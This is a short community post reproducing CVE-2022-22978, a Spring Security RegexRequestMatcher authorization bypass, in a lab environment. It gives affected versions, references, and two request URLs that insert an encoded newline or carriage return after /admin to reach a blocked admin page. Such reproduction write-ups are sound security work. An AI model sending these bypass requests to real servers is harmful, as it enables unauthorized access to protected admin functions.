奇安信攻防社区-CVE-2022-22978 Spring Security Authorization Bypass in RegexRequestMatcher

CVE-2022-22978 Spring Security Authorization Bypass in RegexRequestMatcher

# CVE-2022-22978: Spring Security Authorization Bypass in RegexRequestMatcher In Spring Security versions 5.5.6 and 5.6.3 and older unsupported versions, RegexRequestMatcher can...

CVE-2022-22978: Spring Security Authorization Bypass in RegexRequestMatcher
===========================================================================

In Spring Security versions 5.5.6 and 5.6.3 and older unsupported versions, RegexRequestMatcher can easily be misconfigured to be bypassed on some servlet containers.

Applications using RegexRequestMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass.

References:

- <https://tanzu.vmware.com/security/cve-2022-22978>
- <https://github.com/DeEpinGh0st/CVE-2022-22978>

Vulnerability Environment
-------------------------

After server is started, browse to <http://your-ip:8080/admin> to see that access to the admin page is blocked.

![](https://shs3.b.qianxin.com/butian_public/f939646f117d9dc3ffea1b02274b56f7777adb70633e0.jpg)

Vulnerability Reproduce
-----------------------

Send the following request to access the admin page:

- [http://your-ip:8080/admin/%0atest](http://your-ip:8080/admin/%0Atest)
- [http://your-ip:8080/admin/%0dtest](http://your-ip:8080/admin/%0Dtest)

![](https://shs3.b.qianxin.com/butian_public/f31004098c3e69a510204940f6fb0679ee08b2278a8d5.jpg)

发表于 2024-07-12 18:51:19
阅读 ( 2804 )
分类：开发框架

CVE-2022-22978 Spring Security Authorization Bypass in RegexRequestMatcher

0 条评论